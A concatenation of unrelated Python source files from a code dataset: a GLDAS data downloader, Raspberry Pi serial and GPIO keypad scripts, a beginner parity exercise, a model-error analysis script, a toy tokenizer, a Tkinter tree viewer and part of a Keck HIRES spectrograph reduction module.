formatter_class=argparse.RawTextHelpFormatter,\n )\n\n parser.add_argument(\n \"localroot\",\n help=\"Root of local filesystem where\" \"the data is stored.\",\n )\n\n parser.add_argument(\n \"-s\",\n \"--start\",\n type=mkdate,\n help=(\n \"Startdate as YYYY-MM-DD. \"\n \"If not given then the target\"\n \"folder is scanned for a start date. If no data\"\n \"is found there then the first available date \"\n \"of the product is used.\"\n ),\n )\n\n parser.add_argument(\n \"-e\",\n \"--end\",\n type=mkdate,\n help=(\n \"Enddate. In format YYYY-MM-DD.If not given then the \"\n \"current date is used.\"\n ),\n )\n\n help_string = \"\\n\".join(\n [\n \"GLDAS product to download.\",\n \"GLDAS_Noah_v20_025 available from {} to 2014-12-31\",\n \"GLDAS_Noah_v21_025 available from {}\",\n \"GLDAS_Noah_v21_025_EP available after GLDAS_Noah_v21_025\",\n ]\n )\n\n help_string = help_string.format(\n get_gldas_start_date(\"GLDAS_Noah_v20_025\"),\n get_gldas_start_date(\"GLDAS_Noah_v21_025\"),\n )\n\n parser.add_argument(\n \"--product\",\n choices=[\n \"GLDAS_Noah_v20_025\",\n \"GLDAS_Noah_v21_025\",\n \"GLDAS_Noah_v21_025_EP\",\n ],\n default=\"GLDAS_Noah_v21_025\",\n help=help_string,\n )\n\n parser.add_argument(\"--username\", help=\"Username to use for download.\")\n\n parser.add_argument(\"--password\", help=\"password to use for download.\")\n\n parser.add_argument(\n \"--n_proc\",\n default=1,\n type=int,\n help=\"Number of parallel processes to use for\" \"downloading.\",\n )\n\n args = parser.parse_args(args)\n # set defaults that can not be handled by argparse\n\n # Compare versions to prevent mixing data sets\n version, first, last = gldas_folder_get_version_first_last(args.localroot)\n if args.product and version and (args.product != version):\n raise Exception(\n \"Error: Found products of different version ({}) \"\n \"in {}. Abort download!\".format(version, args.localroot)\n )\n\n if args.start is None or args.end is None:\n if not args.product:\n args.product = version\n if args.start is None:\n if last is None:\n if args.product:\n args.start = get_gldas_start_date(args.product)\n else:\n # In case of no indication if version, use GLDAS Noah 2.0\n # start time, because it has the longest time span\n args.start = get_gldas_start_date(\"GLDAS_Noah_v20_025\")\n else:\n args.start = last\n if args.end is None:\n args.end = datetime.now()\n\n prod_urls = {\n \"GLDAS_Noah_v20_025\": {\n \"root\": \"hydro1.gesdisc.eosdis.nasa.gov\",\n \"dirs\": [\"data\", \"GLDAS\", \"GLDAS_NOAH025_3H.2.0\", \"%Y\", \"%j\"],\n },\n \"GLDAS_Noah_v21_025\": {\n \"root\": \"hydro1.gesdisc.eosdis.nasa.gov\",\n \"dirs\": [\"data\", \"GLDAS\", \"GLDAS_NOAH025_3H.2.1\", \"%Y\", \"%j\"],\n },\n \"GLDAS_Noah_v21_025_EP\": {\n \"root\": \"hydro1.gesdisc.eosdis.nasa.gov\",\n \"dirs\": [\"data\", \"GLDAS\", \"GLDAS_NOAH025_3H_EP.2.1\", \"%Y\", \"%j\"],\n },\n }\n\n args.urlroot = prod_urls[args.product][\"root\"]\n args.urlsubdirs = prod_urls[args.product][\"dirs\"]\n args.localsubdirs = [\"%Y\", \"%j\"]\n\n print(\n \"Downloading data from {} to {} \"\n \"into folder {}.\".format(\n args.start.isoformat(), args.end.isoformat(), args.localroot\n )\n )\n return args\n\n\ndef main(args):\n \"\"\"\n Main routine used for command line interface.\n\n Parameters\n ----------\n args : list of str\n Command line arguments.\n \"\"\"\n args = parse_args(args)\n\n dts = list(daily(args.start, args.end))\n url_create_fn = partial(\n create_dt_url, root=args.urlroot, fname=\"\", subdirs=args.urlsubdirs\n )\n fname_create_fn = partial(\n create_dt_fpath,\n root=args.localroot,\n fname=\"\",\n subdirs=args.localsubdirs,\n )\n\n down_func = partial(\n download,\n num_proc=args.n_proc,\n username=args.username,\n password=\"'\" + args.password + \"'\",\n recursive=True,\n filetypes=[\"nc4\", \"nc4.xml\"],\n )\n download_by_dt(\n dts, url_create_fn, fname_create_fn, down_func, recursive=True\n )\n\n\ndef run():\n main(sys.argv[1:])\n","sub_path":"src/gldas/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":9853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"491553028","text":"import serial\nimport time\nser = serial.Serial(\"/dev/ttyACM0\", 9600, timeout=1)\n\n# Declare the Packet Codes for the Packet Type\nACK = b\"\\x00\"\nNACK = b\"\\x01\"\nHELLO = b\"\\x02\"\n\n# Handshake Flags\nhandshake_flag = True\n\n# Handshake condition\nwhile handshake_flag:\n time.sleep(1) # 1 second pause timing\n ser.write(HELLO) # Send Hello to Arduino\n str = ser.read() # Read Arduino's response\n reply = int.from_bytes(str,byteorder='big', signed=True)\n if (reply == 0): # Check if the reply is an ACK\n handshake_flag = False\n ser.write(ACK) # If true, change flag and ACK\n print('Handshake completed')\n","sub_path":"TestComsRPiCode.py","file_name":"TestComsRPiCode.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"482035166","text":"import RPi.GPIO as GPIO\nimport time\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(18, GPIO.IN, pull_up_down=GPIO.PUD_UP)\nGPIO.setup(23, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n#GPIO.setup(24, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n\n\nclass keypad:\n def __init__(self):\n self.lcd_out=False\n\n def key_input(self):\n #try:\n while True:\n up_state = GPIO.input(18)\n select_state = GPIO.input(23)\n #down_state = GPIO.input(24)\n if not up_state:\n #display.lcd_clear()\n #display.lcd_long_write(display, \"up\", 1)\n time.sleep(0.2)\n return True\n elif not select_state:\n #display.lcd_clear()\n #display.lcd_long_write(display, \"select\", 1)\n time.sleep(0.2)\n return False\n #elif not down_state:\n #display.lcd_clear()\n #display.lcd_long_write(display, \"down\", 1)\n #time.sleep(0.2)\n #return True\n \n #if (not up_state) or (not select_state) or (not down_state):\n #if not (up_state and select_state and down_state):\n #display.lcd_clear()\n #display.lcd_long_write(display, \"lcd_clear\", 1)\n #time.sleep(1)\n #break\n #except KeyboardInterrupt:\n #break\n\n#key = keypad()\n\n#key.key_input()\n '''\n def key_count(self,display, name):\n \n count = 0\n while True:\n up_state = GPIO.input(18)\n select_state = GPIO.input(23)\n # down_state = GPIO.input(24)\n if not up_state:\n time.sleep(0.5)\n while True:\n if not up_state:\n time.sleep(0.2)\n count += 1\n if up_state:\n time.sleep(0.2)\n break\n return count\n elif not select_state:\n time.sleep(0.2)\n return False\n \n display.lcd_clear()\n display.lcd_long_write(display, name + ' : ', 1)\n count = 0\n while True:\n putB = key_input()\n if putB:\n time.sleep(0.5)\n count += 1\n display.lcd_long_write(display, str(count), 2)\n while True:\n putB = key_input()\n if putB:\n time.sleep(0.2)\n count += 1\n display.lcd_long_write(display, str(count), 2)\n #time.sleep(0.2)\n elif not putB:\n time.sleep(0.2)\n break\n \n #break\n return count\n'''","sub_path":"!1215minor/keypaddriver.py","file_name":"keypaddriver.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"7729029","text":"# Ecrire un programme en langage Python qui demande à l'utilisateur de Saisir son Nombre Entier et de lui afficher si ce nombre est Pair ou Impair\n\n# -*- coding: utf-8 -*-\n\nn = input(\"Tapez la valeur de n: \") #Lorsque l'utilisateur tape la valeur de l'entier \"n\", cette valeur sera récuperé sur la variable \"n\"\n#j'examine si l'entier \"n\" est pair ou impair du coup on convertit \"n\" en nombre \"Entier\"\nn = int(n) \n#Une fois la valeur tapé et récuperé sur un Entier \"n\", je dois examiner si cette Entier \"n\" est Pair ou impair !\n#Pour cela, on va utiliser l'opérateur pourcentage\n\nr= n % 2 # r= l'opérateur pourcentage\nif( r ==0 ): # La condition if (“si”) ;\n print(\"Le nombre n tapé est pair\") # La condition if…else (“si…sinon”) ;\nelse: # On utilise la condition if else ici # La condition if…elif…else (“si…sinon si… sinon”)\n print(\"Le nombre n tapé est impair\")\n","sub_path":"Exercice_Python/Premier exo sur Python/3-Nombre Pair ou Impair .py","file_name":"3-Nombre Pair ou Impair .py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"575889868","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 17 14:50:26 2020\n\n@author: RileyBallachay\n\"\"\"\nimport numpy as np\nimport scipy\nimport matplotlib.pyplot as plt\nfrom Signal import Signal\nfrom Model import Model\nimport pandas as pd\nfrom os import path\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import PolynomialFeatures\n\nerrorCSV = \"/Users/RileyBallachay/Documents/Fifth Year/RNNSystemIdentification/Uncertainty/rawDataNew.csv\"\n# These constants are also defined in the Signal module \n# Don't change here unless you also change them there\nnumTrials = 1000\nnstep = 100\ntimelength = 100\ntrainFrac = .7\n\nif not(path.exists(errorCSV)):\n # Initialize the models that are saved using the parameters declared above\n predictor = Model(nstep)\n predictor.load_FOPTD()\n \n deviations = np.arange(0,5)\n \n stdev = np.array([0])\n error=np.array([0])\n kp_pred = np.array([0])\n theta_pred = np.array([0])\n tau_pred = np.array([0])\n \n kp_true = np.array([0])\n theta_true = np.array([0])\n tau_true = np.array([0])\n \n for deviation in deviations:\n # then simulates using the initialized model\n sig = Signal(numTrials,nstep,timelength,trainFrac)\n sig.training_simulation(KpRange=[0.5,10],tauRange=[0.5,10],thetaRange=[0.5,10])\n \n # In this case, since we are only loading the model, not trying to train it,\n # we can use function simulate and preprocess\n xData,yData = sig.simulate_and_preprocess(stdev=deviation)\n \n # Function to make predictions based off the simulation \n predictor.predict(sig,savePredict=False,plotPredict=False)\n \n error = np.concatenate((predictor.errors,error))\n kp_pred = np.concatenate((predictor.kpPredictions[:,0],kp_pred))\n theta_pred = np.concatenate((predictor.thetaPredictions[:,0],theta_pred))\n tau_pred = np.concatenate((predictor.tauPredictions[:,0],tau_pred))\n \n kp_true = np.concatenate((sig.kps,kp_true))\n theta_true = np.concatenate((sig.thetas,theta_true))\n tau_true = np.concatenate((sig.taus,tau_true))\n stdev = np.concatenate((np.full_like(predictor.errors,deviation),stdev))\n \n sd = pd.DataFrame()\n sd['stdev'] = stdev\n sd['mse'] = error\n sd['kpPred'] = kp_pred\n sd['tauPred'] = tau_pred\n sd['thetaPred'] = theta_pred\n sd['kpTrue'] = kp_true\n sd['tauTrue'] = tau_true\n sd['thetaTrue'] = theta_true\n \n sd.to_csv(errorCSV, index=False)\n \nelse:\n try:\n sd = pd.read_csv(errorCSV).drop(['Unnamed: 0'],axis=1)\n sd.drop(sd.tail(1).index,inplace=True)\n except:\n sd = pd.read_csv(errorCSV)\n sd.drop(sd.tail(1).index,inplace=True)\n \n \n\nprefixes = ['kp','tau','theta']\nfor prefix in prefixes:\n sd[prefix+'Error'] = (sd[prefix+'Pred']-sd[prefix+'True'])\n\n hist = np.histogram(sd[prefix+'Error'],bins=100)\n plt.figure(dpi=100)\n plt.hist(sd[prefix+'Error'],bins=100)\n \n h = np.std(sd[prefix+'Error'])\n print(h)\n \n plt.figure(dpi=200)\n plt.plot(sd[prefix+'True'],sd[prefix+'Pred'],'.')\n haha = np.linspace(1,10)+h\n plt.plot(np.linspace(1,10),np.linspace(1,10),'r--')\n plt.plot(np.linspace(1,10),np.linspace(1,10)+h,'g--')\n plt.plot(np.linspace(1,10),np.linspace(1,10)-h,'g--')\n\n\n","sub_path":"Extras/Old Scripts/test_probability_distribution.py","file_name":"test_probability_distribution.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"515565104","text":"from collections import OrderedDict\n\nclass BreakoutLoop(Exception):\n pass\n\nclass Token(object):\n def __init__(self, _type, line, index, value=None):\n self.type = _type\n self.value = value\n self.lineNumber = line\n self.charIndex = index\n\n def __repr__(self):\n return 'Token(' + self.type + ')' + ((' => ' + self.value) if self.value != None else '')\n\nclass Tokenizer(object):\n ALPHA = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ')\n NUM = list('0123456789')\n TOKEN_MAP = OrderedDict([\n ('!=', 'operator_neq'),\n ('==', 'operator_eq'),\n ('>=', 'operator_gte'),\n ('<=', 'operator_lte'),\n ('&&', 'operator_and'),\n ('||', 'operator_or'),\n ('!', 'operator_not'),\n ('=', 'operator_assign'),\n ('>', 'operator_gt'),\n ('<', 'operator_lt'),\n ('[', 'sqr_bracket_open'),\n (']', 'sqr_bracket_close'),\n ('(', 'parentheses_open'),\n (';', 'statemend_end'),\n ('{', 'bracket_open'),\n ('}', 'bracket_close'),\n (')', 'parentheses_close'),\n (',', 'seperator'),\n ('.', 'dot'),\n ('+', 'operator_addition'),\n ('-', 'operator_subtraction'),\n ('*', 'operator_multiplication'),\n ('/', 'operator_division')\n ])\n\n def __init__(self, source):\n self.source = source\n self.index = 0\n self.charIndex = 1\n self.lineNumber = 1\n\n @property\n def any(self):\n return self.index < len(self.source)\n\n @property\n def cur(self):\n return self.source[self.index:self.index + 1]\n\n def starts(self, chr, peek=None):\n if isinstance(chr, list):\n for sub in chr:\n if self.starts(sub, peek):\n return True\n \n return False\n\n index = self.index if peek == None else self.index + peek\n length = len(chr)\n cur = self.source[index:index + length]\n\n return cur == chr\n\n def next(self, n=1):\n self.index += n\n self.charIndex += n\n\n if self.cur == '\\n':\n self.lineNumber += 1\n self.charIndex = 1\n\n def identifier(self):\n ident = ''\n\n while self.any and (self.starts(self.ALPHA) or (len(ident) > 0 and self.starts(self.NUM + ['_']))):\n ident += self.cur\n self.next()\n\n return self.makeToken('identifier', ident)\n\n def string(self):\n value = ''\n line = self.lineNumber\n char = self.charIndex\n\n self.next()\n\n while self.any and not self.starts('\\''):\n if self.starts('\\\\') and self.starts('\\'', peek=1):\n value += '\\''\n self.next(2)\n continue\n\n value += self.cur\n self.next()\n\n if self.cur != '\\'':\n raise Exception('Expecting STRING_END instead got: ' + self.cur)\n\n self.next()\n\n return Token('string', line, char, value)\n\n def number(self):\n value = ''\n\n while self.any and self.starts(self.NUM):\n value += self.cur\n self.next()\n\n return self.makeToken('number', value)\n \n def makeToken(self, _type, value=None):\n return Token(_type, self.lineNumber, self.charIndex, value)\n \n def autoStatemendEnd(self, tokens, isTail=False):\n autoTypes = [\n 'statemend_end',\n 'bracket_open',\n 'bracket_close'\n ]\n\n if not isTail and not self.starts(['\\t', '\\n']):\n return False\n\n return len(tokens) > 0 and len([t for t in autoTypes if tokens[-1].type == t]) == 0\n \n def skipComment(self):\n self.next(2)\n\n while self.any:\n if self.starts('\\n'):\n self.next()\n break\n \n self.next()\n \n def parseType(self):\n basics = ['bool', 'string', 'number']\n\n for name in basics:\n if self.starts(name):\n self.next(len(name))\n return name\n \n if self.starts('array<'):\n self.next(6)\n\n innerType = ''\n\n while self.any:\n if self.cur == '>':\n self.next()\n break\n\n innerType += self.cur\n self.next()\n \n return 'array<' + innerType + '>'\n\n def tokenize(self):\n tokens = []\n\n while self.any:\n if self.autoStatemendEnd(tokens):\n tokens.append(self.makeToken('statemend_end'))\n\n if self.starts('//'):\n self.skipComment()\n elif self.starts([' ', '\\t', '\\n', '\\r']):\n self.next()\n elif self.starts('import '):\n tokens.append(self.makeToken('import'))\n self.next(7)\n elif self.starts('fn '):\n tokens.append(self.makeToken('function'))\n self.next(3)\n elif self.starts('each '):\n tokens.append(self.makeToken('foreach'))\n self.next(5)\n elif self.starts('return '):\n tokens.append(self.makeToken('return'))\n self.next(7)\n elif self.starts('if '):\n tokens.append(self.makeToken('if'))\n self.next(3)\n elif self.starts('in '):\n tokens.append(self.makeToken('operator_in'))\n self.next(3)\n elif self.starts('else '):\n tokens.append(self.makeToken('else'))\n self.next(5)\n elif self.starts('elif '):\n tokens.append(self.makeToken('elseif'))\n self.next(5)\n elif self.starts([ 'number', 'bool', 'string' ]):\n tokens.append(self.makeToken('type', self.parseType()))\n elif self.starts('array<'):\n tokens.append(self.makeToken('type', self.parseType()))\n elif self.starts(self.ALPHA):\n token = self.identifier()\n\n if token.value == 'true' or token.value == 'false':\n tokens.append(self.makeToken('boolean', token.value))\n else:\n tokens.append(token)\n elif self.starts('\\''):\n tokens.append(self.string())\n elif self.starts(self.NUM):\n tokens.append(self.number())\n else:\n try:\n for char, typeName in self.TOKEN_MAP.items():\n if self.starts(char):\n tokens.append(self.makeToken(typeName))\n self.next(len(char))\n raise BreakoutLoop()\n except BreakoutLoop:\n continue\n\n raise Exception('Unknown character `' + self.cur + '` on line ' + str(self.lineNumber))\n\n if self.autoStatemendEnd(tokens, isTail=True):\n tokens.append(self.makeToken('statemend_end'))\n\n return tokens\n","sub_path":"src/compiler/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":7055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"165895429","text":"\"\"\"Simple interface for watching created trees. Definitely not best piece of code but it works.\"\"\"\n\nfrom tkinter import *\nfrom nodes import *\nfrom collections import deque\n\n\nclass MappedPoint:\n\n def __init__(self, pos_x, pos_y):\n self.pos_x = pos_x\n self.pos_y = pos_y\n\n\n# Function that draws lines connecting points a and b. It is also returning new point - center of connection.\ndef _connect_points(a, b, canvas):\n if b.pos_x > a.pos_x:\n a, b = b, a\n canvas.create_line(a.pos_x, a.pos_y, b.pos_x - 20, a.pos_y)\n canvas.create_line(b.pos_x, b.pos_y, b.pos_x - 20, b.pos_y)\n canvas.create_line(b.pos_x - 20, a.pos_y, b.pos_x - 20, b.pos_y)\n return MappedPoint(b.pos_x - 20, (a.pos_y + b.pos_y) / 2)\n\n\n# nodes_list is list of nodes in order of connecting them\n# seq_list is a list of sequences, which is needed to write them also in right order\ndef _map_tree(node, nodes_list, seq_list):\n nodes_list.appendleft(node)\n\n if isinstance(node.left, Leaf):\n seq_list.append(node.left)\n else:\n _map_tree(node.left, nodes_list, seq_list)\n\n if isinstance(node.right, Leaf):\n seq_list.append(node.right)\n else:\n _map_tree(node.right, nodes_list, seq_list)\n\n\ndef _draw_tree(tree, canvas):\n x = 600\n y = 500\n nodes_list = deque()\n seq_list = list()\n _map_tree(tree, nodes_list, seq_list)\n\n canvas.delete(\"all\")\n\n # points is a dictionary storing points by a nodes and leafs unique numbers\n points = dict()\n for i, seq in enumerate(seq_list, 0):\n canvas.create_text(x, y - i * 20, text=str(seq))\n points[seq.number] = MappedPoint(x - 30, y - i * 20)\n\n while nodes_list:\n node = nodes_list.popleft()\n point_a = points[node.left.number]\n point_b = points[node.right.number]\n new_point = _connect_points(point_a, point_b, canvas)\n points[node.number] = new_point\n canvas.create_oval(new_point.pos_x - 6, new_point.pos_y - 6,\n new_point.pos_x + 6, new_point.pos_y + 6,\n fill=\"black\")\n canvas.create_text(new_point.pos_x, new_point.pos_y, text=str(node.bootstrap), fill=\"#00FFF9\")\n\n\ndef run_graphics(trees):\n\n tree_index = 0\n max_index = len(trees) - 1\n\n def scroll_start(event):\n canvas.scan_mark(event.x, event.y)\n\n def scroll_move(event):\n canvas.scan_dragto(event.x, event.y, gain=1)\n\n def previous_tree(event):\n nonlocal canvas\n nonlocal tree_index\n\n if tree_index == 0:\n return\n\n tree_index -= 1\n _draw_tree(trees[tree_index][0], canvas)\n canvas.create_text(750, 550, text=str(tree_index + 1))\n canvas.create_text(750, 580, text=str(trees[tree_index][1]))\n\n def next_tree(event):\n nonlocal canvas\n nonlocal tree_index\n nonlocal max_index\n\n if tree_index == max_index:\n return\n\n tree_index += 1\n _draw_tree(trees[tree_index][0], canvas)\n if tree_index == max_index:\n canvas.create_text(750, 550, text=\"BEST TREE! \" + str(tree_index + 1))\n else:\n canvas.create_text(750, 550, text=str(tree_index + 1))\n canvas.create_text(750, 580, text=str(trees[tree_index][1]))\n\n root = Tk()\n root.title(\"Phylogenetic tree\")\n root.geometry('800x600')\n\n # These are mainly configurations for scrolling since our trees can get big really fast\n canvas = Canvas(root, width=800, height=600)\n xsb = Scrollbar(root, orient=\"horizontal\", command=canvas.xview)\n ysb = Scrollbar(root, orient=\"vertical\", command=canvas.yview)\n canvas.configure(bg=\"white\", yscrollcommand=ysb.set, xscrollcommand=xsb.set)\n canvas.configure(scrollregion=(-1000, -1000, 1000, 1000))\n\n xsb.grid(row=1, column=0, sticky=\"ew\")\n ysb.grid(row=0, column=1, sticky=\"ns\")\n canvas.grid(row=0, column=0, sticky=\"nsew\")\n\n canvas.bind(\"\", scroll_start)\n canvas.bind(\"\", scroll_move)\n root.bind(\"a\", previous_tree)\n root.bind(\"d\", next_tree)\n\n _draw_tree(trees[tree_index][0], canvas)\n canvas.create_text(750, 550, text=str(tree_index + 1))\n canvas.create_text(750, 580, text=str(trees[tree_index][1]))\n\n root.mainloop()\n","sub_path":"src/graphic_tree.py","file_name":"graphic_tree.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"649001497","text":"import os\nimport re\nimport logging\nlogger = logging.getLogger(__name__)\nimport configparser\n\nimport numpy as np\nfrom scipy.ndimage.filters import gaussian_filter\nimport astropy.io.fits as fits\nfrom astropy.table import Table\nfrom astropy.time import Time\n\nfrom ..echelle.imageproc import combine_images\nfrom ..echelle.trace import find_apertures, load_aperture_set, TraceFigureCommon\nfrom ..echelle.background import simple_debackground\nfrom ..echelle.extract import extract_aperset\nfrom ..echelle.flat import get_slit_flat\nfrom ..utils.obslog import parse_num_seq, read_obslog\nfrom ..utils.misc import extract_date\n\nfrom .common import FormattedInfo\n\nall_columns = [\n ('frameid', 'int', '{:^7s}', '{0[frameid]:7d}'),\n ('fileid', 'str', '{:^17s}', '{0[fileid]:17s}'),\n ('imgtype', 'str', '{:^7s}', '{0[imgtype]:^7s}'),\n ('object', 'str', '{:^20s}', '{0[object]:20s}'),\n ('i2cell', 'bool', '{:^6s}', '{0[i2cell]!s: <6}'),\n ('exptime', 'float', '{:^7s}', '{0[exptime]:7g}'),\n ('obsdate', 'time', '{:^23s}', '{0[obsdate]:}'),\n ('deckname', 'str', '{:^8s}', '{0[deckname]:^8s}'),\n ('filter1', 'str', '{:^7s}', '{0[filter1]:^7s}'),\n ('filter2', 'str', '{:^7s}', '{0[filter2]:^7s}'),\n ('nsat_1', 'int', '{:^8s}', '\\033[34m{0[nsat_1]:8d}\\033[0m'),\n ('nsat_2', 'int', '{:^8s}', '\\033[32m{0[nsat_2]:8d}\\033[0m'),\n ('nsat_3', 'int', '{:^8s}', '\\033[31m{0[nsat_3]:8d}\\033[0m'),\n ('q95_1', 'int', '{:^8s}', '\\033[34m{0[q95_1]:8d}\\033[0m'),\n ('q95_2', 'int', '{:^8s}', '\\033[32m{0[q95_2]:8d}\\033[0m'),\n ('q95_3', 'int', '{:^8s}', '\\033[31m{0[q95_3]:8d}\\033[0m'),\n ]\n\ndef print_wrapper(string, item):\n \"\"\"A wrapper for log printing for HIRES pipeline.\n\n Args:\n string (str): The output string for wrapping.\n item (:class:`astropy.table.Row`): The log item.\n\n Returns:\n str: The color-coded string.\n\n \"\"\"\n imgtype = item['imgtype']\n obj = item['object']\n\n if len(obj)>=4 and obj[0:4]=='bias':\n # bias images, use dim (2)\n return '\\033[2m'+string.replace('\\033[0m', '')+'\\033[0m'\n\n elif imgtype=='sci':\n # sci images, use highlights (1)\n return '\\033[1m'+string.replace('\\033[0m', '')+'\\033[0m'\n\n elif len(obj)>=8 and obj[0:8]=='flatlamp':\n # flat images, analyze nsat\n nsat_1 = item['nsat_1']\n nsat_2 = item['nsat_2']\n nsat_3 = item['nsat_3']\n q95_1 = item['q95_1']\n q95_2 = item['q95_2']\n q95_3 = item['q95_3']\n q_lst = [q95_1 if q95_1 < 6e4 else -1,\n q95_2 if q95_2 < 6e4 else -1,\n q95_3 if q95_3 < 6e4 else -1]\n\n maxccd = np.argmax(q_lst)\n\n if max(q_lst)<0:\n # all CCDs are saturated\n return string\n\n elif 'quartz1' in obj and maxccd == 0:\n # quartz1 for UV, use light magenta (95)\n return '\\033[95m'+string.replace('\\033[0m', '')+'\\033[0m'\n\n elif maxccd == 0:\n # blue flat, use light blue (94)\n return '\\033[94m'+string.replace('\\033[0m', '')+'\\033[0m'\n\n elif maxccd == 1:\n # green flat, use light green (92)\n return '\\033[92m'+string.replace('\\033[0m', '')+'\\033[0m'\n\n elif maxccd == 2:\n # red flat, use light red (91)\n return '\\033[91m'+string.replace('\\033[0m', '')+'\\033[0m'\n\n else:\n # no idea\n return string\n\n elif len(obj)>=7 and obj[0:7]=='arclamp':\n # arc lamp, use light yellow (93)\n return '\\033[93m'+string.replace('\\033[0m', '')+'\\033[0m'\n else:\n return string\n\n\ndef make_config():\n \"\"\"Generate a config file for reducing the data taken with Xinglong 2.16m\n HRS.\n\n\n \"\"\"\n # find date of data obtained\n current_pathname = os.path.basename(os.getcwd())\n guess_date = extract_date(current_pathname)\n\n while(True):\n if guess_date is None:\n prompt = 'YYYYMMDD'\n else:\n prompt = guess_date\n\n string = input('Date of observation [{}]: '.format(prompt))\n input_date = extract_date(string)\n if input_date is None:\n if guess_date is None:\n continue\n else:\n input_date = guess_date\n break\n else:\n break\n \n input_datetime = datetime.datetime.strptime(input_date, '%Y-%m-%d')\n\n # create config object\n config = configparser.ConfigParser()\n\n config.add_section('data')\n\n config.set('data', 'telescope', 'Keck-I')\n config.set('data', 'instrument', 'HIRES')\n config.set('data', 'rawpath', 'rawdata')\n #config.set('data', 'statime_key', statime_key)\n #config.set('data', 'exptime_key', exptime_key)\n\n config.add_section('reduce')\n config.set('reduce', 'midpath', 'midproc')\n config.set('reduce', 'figpath', 'images')\n config.set('reduce', 'odspath', 'onedspec')\n config.set('reduce', 'mode', 'normal')\n config.set('reduce', 'oned_suffix', 'ods')\n config.set('reduce', 'fig_format', 'png')\n \n config.add_section('reduce.bias')\n config.set('reduce.bias', 'bias_file', '${reduce:midpath}/bias.fits')\n config.set('reduce.bias', 'cosmic_clip', str(10))\n config.set('reduce.bias', 'maxiter', str(5))\n config.set('reduce.bias', 'smooth', 'yes')\n config.set('reduce.bias', 'smooth_method', 'gaussian')\n config.set('reduce.bias', 'smooth_sigma', str(3))\n config.set('reduce.bias', 'smooth_mode', 'nearest')\n\n config.add_section('reduce.trace')\n config.set('reduce.trace', 'minimum', str(1e-3))\n config.set('reduce.trace', 'scan_step', str(100))\n config.set('reduce.trace', 'separation', '100:84, 1500:45, 3000:14')\n config.set('reduce.trace', 'filling', str(0.2))\n config.set('reduce.trace', 'align_deg', str(2))\n config.set('reduce.trace', 'display', 'no')\n config.set('reduce.trace', 'degree', str(4))\n config.set('reduce.trace', 'file', '${reduce:midpath}/trace.fits')\n\n config.add_section('reduce.flat')\n config.set('reduce.flat', 'file', '${reduce:midpath}/flat.fits')\n\n # write to config file\n filename = 'HIRES.{}.cfg'.format(input_date)\n outfile = open(filename, 'w')\n for section in config.sections():\n maxkeylen = max([len(key) for key in config[section].keys()])\n outfile.write('[{}]'.format(section)+os.linesep)\n fmt = '{{:{}s}} = {{}}'.format(maxkeylen)\n for key, value in config[section].items():\n outfile.write(fmt.format(key, value)+os.linesep)\n outfile.write(os.linesep)\n outfile.close()\n\n print('Config file written to {}'.format(filename))\n \n\ndef parse_3ccd_images(hdu_lst):\n \"\"\"Parse the 3 CCD images.\n\n Args:\n hdu_lst (:class:`astropy.io.fits.HDUList`): Input HDU list.\n\n Returns:\n tuple: A tuple containing:\n\n * **data_lst** (*tuple*): A tuple of (Image1, Image2, Image3).\n * **mask_lst** (*tuple*): A tuple of (Mask1, Mask2, Mask3).\n\n \"\"\"\n if len(hdu_lst) != 4:\n raise ValueError\n\n # get CCD Binning\n tmp = hdu_lst[0].header['CCDSUM'].split()\n binx, biny = int(tmp[0]), int(tmp[1])\n # get data sect rectanle\n dataset_lst = {(2, 1): ('[7:1030,1:4096]', (6, 1030), (0, 4096)),\n (2, 2): ('[7:1030,1:2048]', (6, 1030), (0, 2048)),\n }\n datasec, (x1, x2), (y1, y2) = dataset_lst[(binx, biny)]\n # get data section\n data_lst = [hdu_lst[i+1].data[y1:y2, x1:x2] for i in range(3)\n if hdu_lst[i+1].header['DATASEC']==datasec]\n\n # get saturated masks\n mask_sat1 = data_lst[0]==65535 # for UV CCD, saturated pixels are 65535.\n mask_sat2 = data_lst[1]==0 # for green & red CCDs, saturated pixels\n mask_sat3 = data_lst[2]==0 # are 0.\n # get bad pixel masks\n #mask_bad1 = np.zeros_like(mask_sat1, dtype=np.bool)\n #mask_bad2 = np.zeros_like(mask_sat1, dtype=np.bool)\n #mask_bad3 = np.zeros_like(mask_sat1, dtype=np.bool)\n mask_bad1 = get_badpixel_mask((binx, biny), ccd=1)\n mask_bad2 = get_badpixel_mask((binx, biny), ccd=2)\n mask_bad3 = get_badpixel_mask((binx, biny), ccd=3)\n # pack masks\n mask1 = np.int16(mask_sat1)*4 + np.int16(mask_bad1)*2\n mask2 = np.int16(mask_sat2)*4 + np.int16(mask_bad2)*2\n mask3 = np.int16(mask_sat3)*4 + np.int16(mask_bad3)*2\n\n mask_lst = (mask1, mask2, mask3)\n\n # fix saturated pixels in the green and red CCDs\n data_lst[1][mask_sat2] = 65535\n data_lst[2][mask_sat3] = 65535\n\n return (data_lst, mask_lst)\n\ndef make_obslog(path):\n \"\"\"Scan the raw data, and generated a log file containing the detail\n information for each frame.\n\n An ascii file will be generated after running. The name of the ascii file is\n `YYYY-MM-DD.log`.\n\n Args:\n path (str): Path to the raw FITS files.\n\n \"\"\"\n 